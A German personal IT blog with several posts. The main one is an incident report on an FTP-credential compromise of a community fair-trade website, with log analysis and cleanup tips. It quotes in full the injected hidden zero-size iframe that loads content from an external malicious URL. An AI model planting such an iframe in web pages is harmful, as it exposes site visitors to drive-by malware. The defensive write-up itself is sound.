Glorf IT

In unserer Gemeinde betreiben einige Engagierte die sehr erfolgreiche Web-Seite Fairlangen.org. Dabei geht es darum sich darüber auszutauschen, wo man in Erlangen fair gehandelte Waren kaufen kann. Über Wege, die mir noch nicht klar sind, hat ein Bösewicht Zugang zu dem FTP-Passwort der Seite bekommen und ein paar der dort vorhandenen Index-Seiten (index.htm, index.html und index.php) mit einem bösartigen Code-Snippet verseucht. Wirksam war dabei aber lediglich die Seite "index.php". Einem Menschen wäre sicher sofort aufgefallen, dass die index.htm und index.html nur über einen direkten Link aufgerufen werden konnten und eigentlich sinnlos waren (jetzt sind sie Geschichte). Daher vermute ich, dass das alles automatisiert erfolgte.

Einen der Log-Einträge habe ich bereits vorher erklärt (ist nur an zwei Stellen anonymisiert):

Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 65 /www/htdocs/xxxxxxxx/index.htm b _ o r yyyyyyyy ftp 0 * c
Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 198 /www/htdocs/xxxxxxxx/index.htm b _ i r yyyyyyyy ftp 0 * c

Daran sieht man, dass nicht unser Webserver kompromittiert und dann der Schadcode via CMS eingeschleust wurde, sondern der FTP-Zugriff von einem anderen System (174.37.220.147 sind wir nicht) erfolgte. HIer sieh man, wie eine der verseuchten Dateien gespeichert, manipuliert und noch in der gleichen Sekunde wieder hoch geladen wurde. Danach war sie um ein iframe reicher (Bitte nicht der URL folgen, ist absichtlich kein Link!):

<iframe src="http://quake2012.ru/in.php?a=QQkFBwQHBAEABQQMEkcJBQcEBwAEAwUBAw==" width="0" height="0" frameborder="0"></iframe>

Aus naheliegenden Gründen habe ich nicht ausprobiert, was dieser fremde Link für Code nachlud. Ich hoffe, dass er nicht viel Schaden anrichtete. Unsere Seite würde nämlich sehr schnell von einschlägigen Seiten als bösartig eingestuft. Daher warnten Firefox, Safari und Google vor dem Besuch unserer Seite.

Nach der Änderung aller Passwörter (und dem Eintragen der DB-Passwörter in tausend INIs) und der Bereinigung der Seite, fing die eigentlich Arbeit an. Weil mir unklar war, wie der Gauner an das FTP-Passwort kam (der eigentliche Betreuer der Webseite ist in Urlaub), konnte ich nur vermuten. Es sieht nicht danach aus, als wäre die Seite kompromittiert worden, sondern eher der Rechner eines der FTP-Nutzer dieser Seite. Trotzdem habe ich sämtliche Software darauf aktualisiert, das war ohnehin fällig.

Aus der Erfahrung meine Tipps in der Situation:

• cool bleiben und nichts einfach löschen
• Die Domäne einfach mal in ein leeres Unterverzeichnis umleiten oder wenigstens die Index-Seiten als erstes einfach mal umbenennen, um die Leser mit älteren Browsern, die nicht warnen, zu schützen.
• Das FTP-Passwort ändern.
• Wenn genug Bandbreite da ist (sehr zu empfehlen): Den aktuellen, verseuchten Stand lokal sichern, sonst nur die infizierten Dateien separat speichern.
• Mittels einen DIFF-Tool, wie bspw. BeyondCompare (billig und gut) den aktuellen Stand auf dem Webserver mit der letzten lokalen Sicherung vergleichen und die betroffenen Dateien ermitteln.
• Die Log-Dateien sichten, bei uns wurde ich schnell im FTP-Log fündig.
• Mit der letzten Sicherung zurück setzen.
• Alle Passwörter ändern, die in irgendwelchen Dateien stehen, selbst wenn die Dateien nicht per FTP herunter geladen wurden. Ein Bösling könnte sie auch per PHP zippen und dann als Zip runter laden. Ich persönlich wurde das auch tun, wenn ich in den Logs genau sehen kann, dass sonst nicht weiter herunter geladen wurde.
• Domäne wieder auf den nun sauberen Stand umleiten und nötigenfalls Updates aller Software einspielen.
• Google, Firefox, etc davon überzeugen, dass wir wieder zu den Guten gehören.

Das Timing war übrigens perfekt: Der eigentliche Betreuer in Urlaub, mein griffbereites letztes Backup Monate alt, Ostern, schönes Wetter, …

Am Wochenende musste ich kurzfristig die Log-Files eines FTP-Servers unserer Gemeinde analysieren und kam zum Schluss, dass ein Bösewicht wohl an das FTP-Passwort gekommen sein muss. Die lange Fassung folgt noch. HIer mal vorab der Link, wie man die LogFiles verstehen kann: WU-FTPD – Manual: xferlog.5.

Hier ein Beispiel aus dem echten Leben:

Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 65 /www/htdocs/xxxxxxxx/index.htm b _ o r yyyyyyyy ftp 0 * c
Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 198 /www/htdocs/xxxxxxxx/index.htm b _ i r yyyyyyyy ftp 0 * c

Das bedeutet:

• Am 19.4.2011 um 14:02 wurde
• die Datei "index.htm" aus dem Rootverzeichnis (Verzeichnis anonymisiert)
• mit der Größe 65 Bytes heruntergeladen
• vom FTP-Benutzer yyyyyyyy von der IP-Adresse 174.37.220.147
• gelesen ("o" für "output").
• Und sofort danach mit der Größe 198 Bytes hoch geladen.

Weitere Infos findet man im WU-FTPD – Manual: xferlog.5.

Gestern hatte ich die Ehre den Alt-Laptop der Gemeinde zu aktualisieren. Weil der Auto-Update von "Avira AntiVir" nicht klappte, lud ich die aktuelle Version von deren Webseite runter. Ich versuchte es wenigstens, denn Avira meldete einen Virus in dem Download von Avira. Das sind schon Scherzkekse.

Falls jemand Zweifel hat: Das war tatsächlich ein Fehlalarm. Aber ein ziemlich lästiger…

Wer sich die neue Schmallspurversion des "Small Business Servers 2011" mal anschauen will, der kann sich bei der TechNet die 180-Tage-Testversion runter laden. Dazu muss man sich mit einer Live-ID registieren. Ein TechNet-Abo ist offenbar nicht erforderlich. Dazu muss man auf dieser Seite auf "Fangen Sie an" klicken.

Dem Vergleich der Features der Editionen kann man entnehmen, dass die Edition Essentials für bis zu 25 Benutzer ausgelegt ist und keine CALs lizenziert werden müssen. Dafür sind weniger Zusatzdienste integriert: kein Exchange, kein SharePoint und kein WSUS (Windows Software Update Services). Diese Ausgabe ist ideal um dort Geschäftsanwendungen zu installieren. Falls die genannten Dienste doch benötigt werden, kann man sie bei Microsoft einzeln als Online beziehen.

Wie seit vorgestern zu lesen ist, möchte die hiesige Universität die Marke "FAU" stärken. Dazu soll das bisherige Logo abgeschafft und ein anderes im Retro-Look der 70er ersetzt werden. Offenbar wurde es rechtzeitig versäumt in den Außenauftritt der einzelnen Fakultäten aufeinander abzustimmen (Quelle):

„Durch eigene Logos von Fakultäten und gänzlich unabhängig voneinander entstandene Gestaltungslinien wurde es immer schwerer, die FAU als ein Ganzes wahrzunehmen“, sagt Prof. Grüske. „Selbst innerhalb einzelner Fakultäten gab und gibt es eine Vielzahl von Erscheinungsbildern, die nichts miteinander zu tun haben. Unser Ziel ist es, mit dem neuen Logo den ersten Schritt zu einem gemeinsamen Erscheinungsbild zu machen, das die Universität in ihrer Gesamtheit transportiert und den Fakultäten trotzdem den Freiraum gibt, als Träger von Wissenschaft, Forschung und Lehre wahrgenommen zu werden.“

Die Idee ist sehr gut, die Umsetzung hingegen finde ich nicht gelungen. Anstelle ein Logo zu entwickeln, dass die bestehende Form aufgreift und modernisiert, wurde ein Retro-Look der 70er gewählt, deren Differenzierung Menschen mit Farbschwäche entgehen dürfte. Zudem haben meine Augen ein Problem damit, weil die weißen Streifen in den Buchstaben zu groß sind. Was sagen denn die Mediziner zu dem Logo?
Tut mir leid, aber für mich wirkt das Streifenlogo insgesamt altbacken: "Gut gemeint" ist nicht "gut gemacht". Ein paar Tage früher und ich hätte es für einen April-Scherz gehalten…

Seltsamerweise scheinen auch die Macher nicht so ganz von Ihrer Idee überzeugt, schreiben Sie doch:

Auch das Siegel bleibt erhalten. „Um die Tradition der FAU als klassische Universität nicht zu vernachlässigen“ erläutert Prof. Grüske, „werden wir das Siegel in unterschiedlichen Zusammenhängen weiter verwenden, etwa als Wasserzeichen auf Briefbögen und Visitenkarten sowie geprägt auf Urkunden.“

Hoppla? Wenn dem so ist, dann sollte die Universität ein Logo wählen, was beiden Ansprüchen gerecht wird…
Es gibt seit heute auch eine Petition für das alte Logo, leider noch ohne Gegenvorschlag, aber wer weiß, vielleicht finden sich ein paar Studenten und machen einen besseren Vorschlag, der auch den Zielen gerecht wird…

Über Spiegel.de erfuhr ich heute über eine Datenpanne, deren Größe und Folgen noch nicht abgeschätzt werden können:

Ein Hacker habe sich Informationen von Kunden der Großbank JPMorgan Chase und der Supermarktkette Kroger verschafft, berichtet der Fachdienst "Security Week". Auch das Techunternehmen TiVo wies seine Kunden auf den Hack hin.
Der Unbekannte sei in das Datensystem des Online-Händlers Epsilon eingedrungen und habe deren Kundenkarteien durchforstet, teilte die Großbank mit. Der Hacker habe sich Zugriff auf E-Mail-Adressen und Hausanschriften verschafft, jedoch nicht auf persönliche oder finanzielle Informationen.

Auf SecurityWeek.com findet man detailliertere Infos: Die Firma Epsilon verwaltet im Auftrag von Unternehmen die Daten von deren Kunden und übernimmt die Kommunikation. Offenbar waren sie dabei nicht besonders sorgfältig. Möglicherweise wurden die gesamten Kunden-Daten ihrer Kunden erbeutet. Hier ein paar Firmen, die Epsilon mit der Kundenverwaltung beauftragten und deren Daten nun vermutlich erbeutet wurden (darunter mehrere Banken und andere Firmen mit großen Kundenzahlen):

• Kroger
• TiVo
• US Bank
• JPMorgan Chase
• Capital One
• Citi
• Home Shopping Network (HSN)
• McKinsey & Company
• Ritz-Carlton Rewards
• Marriott Rewards
• New York & Company
• Brookstone
• Walgreens
• The College Board

Die erspähten Daten reichen in der Regel, um jemandem das Leben zur Hölle zu machen: Anschrift (vermutlich inkl. Telefonnummer) und Mail-Adresse. Wenn es ganz dumm gelaufen ist, dann auch noch weitere Daten, wie Kundennummern bei der jeweiligen Firma. Immerhin werden die betroffenen Kunden diesmal informiert.

Jedenfalls nicht bei Anrufen in denen jemand so die Contenance verliert:

Transskript:

Kies, ich versuche aus NULL die Anwendung IMO… IMO Resolutions zu starten, steht 'Kein Zugriff auf Server glhv3'. Bitte korrigieren Sie das ganz schnell – ich sage es noch mal – ganz schnell. Ich muss hier arbeiten. Ich kann es mir nicht leisten, ständig auf irgendeinen Scheiss zu warten, den die IT nicht auf die Reihe kriegt.

Ich nehme an, dass es wohl eher nicht um die IMO Resolutions der "International Maritime Organization (IMO)" geht… aber was sonst?

Die Schlagzahl bei der SQL-PASS Franken hat sich durch den Attunity-Werbeblock vor zwei Wochen deutlich erhöht. Diesmal kommt aber wieder ein echter HardCore-SQL-Server-Spezialist mit einem sehr ausgefallenen Vortrag ins Rennen: "Desaster-Dokumentation … hilft Hochverfügbarkeit?"
Referent ist der für seinen hintergründigen Humor bekannte Ralf Dietrich. Wer sonst käme auf so einen ausgefallenen Titel, der gleichermaßen verwirrt wie neugierig macht? Bekannt wurde er aber eigentlich durch seine vielfältigen Schulungen und Vorträge auf allen möglichen Kongressen und Tagungen.

Der Termin ist übrigens am Dienstag, den 12.4.2011 um 18:30 Uhr.

Er findet wieder im Vortragssaal der New Elements GmbH (Thurn-und-Taxis-Straße 10, 90411 Nürnberg) statt. Wie immer bitte vorher die Teilnahme bei Michael Deinhard (M.Deinhard(ät)newelements.de) oder Klaus Oberdalhoff (kob(ät)sqlpass.de) ankündigen, damit die Anzahl der benötigten Stühle abgeschätzt werden kann. Kosten: keine. Wer für den Referenten Geld bezahlen möchte, finde hier ein paar gute Gelegenheiten.

Hier die Beschreibung im O-Ton:

"Desaster-Dokumentation … hilft Hochverfügbarkeit?"
Verwaltung/Projekte:
- Dokumentation / Technische Dokumentation / Notfallpläne / Qualitätssicherung
- Notwendiges Übel oder lästige Pflicht oder …
- was braucht man unbedingt,
- was ist trotz hohem Aufwand sehr nützlich
- was kann man gerne weglassen
- Was kann mir helfen, die Arbeit zu automatisieren?

Was macht Ihr? Nicht alles ist für jede Unternehmensgröße wichtig …

ein Diskussionsabend mit Einführung und vielen praktischen Erfahrungen aber bitte ohne Meckern.

Es ist nicht geplant, das Ganze in der Art einer "Schulstunde" (Wenn alles schläft und einer spricht, so nennt man sowas Unterricht) abzuhalten, sondern es ist eher als lockere Diskussionsrunde geplant, bei der jeder seine Erfahrungen mit einbringen sollte.

Info zu Ralf Dietrich

Nach dem Studium arbeitet Ralf Dietrich seit mehr als 12 Jahren als Strategieconsultant, IT-Berater, Datenbankarchitekt und Trainer. In vielfältigen Umgebungen vom Mittelstand bis zum internationalen Konzern lernte er sowohl VLDB-Installationen als auch systemkritische Implementierungen kennen und hilft mit, diese teilweise entscheidend zu verbessern, indem er die Systemarchitekturen, Betriebskonzepte und -abläufe optimiert und gelegentlich unter Berücksichtigung vom speziellen Sicherheits- und Performanceaspekten neu entwirft und implementiert.

Als Geschäftsführer der datafino GmbH kann er darüber hinaus auf ein weiträumig agierendes Team von Spezialisten zurückgreifen.

Als Sprecher war er unter anderem auch auf dem SQL Server Summit in Seattle 2010 und ist jetzt neben der Leitung der RG Sachsen seit der letzten Mitgliederversammlung wieder im deutschen PASS-Vorstand tätig.

Möglicherweise werden wir Ralf in unserem Kreis nicht mehr so oft begrüßen können, daher freue ich mich auf den Abend ganz besonders. Wer sich diese Gelegenheit entgehen lässt, der ist selber schuld…

Wer sich die nächsten Termine frei halten will, findet sie jeweils aktuell bei der SQL-PASS Franken. Hier der heutige Stand: 17.5. / 28.6. / 19.7. / 23.8. (Biergarten) / 20.9. / 18.10. / 15.11.
Die Themen stehen teilweise schon fest und ich kann nur sagen: beachtlich!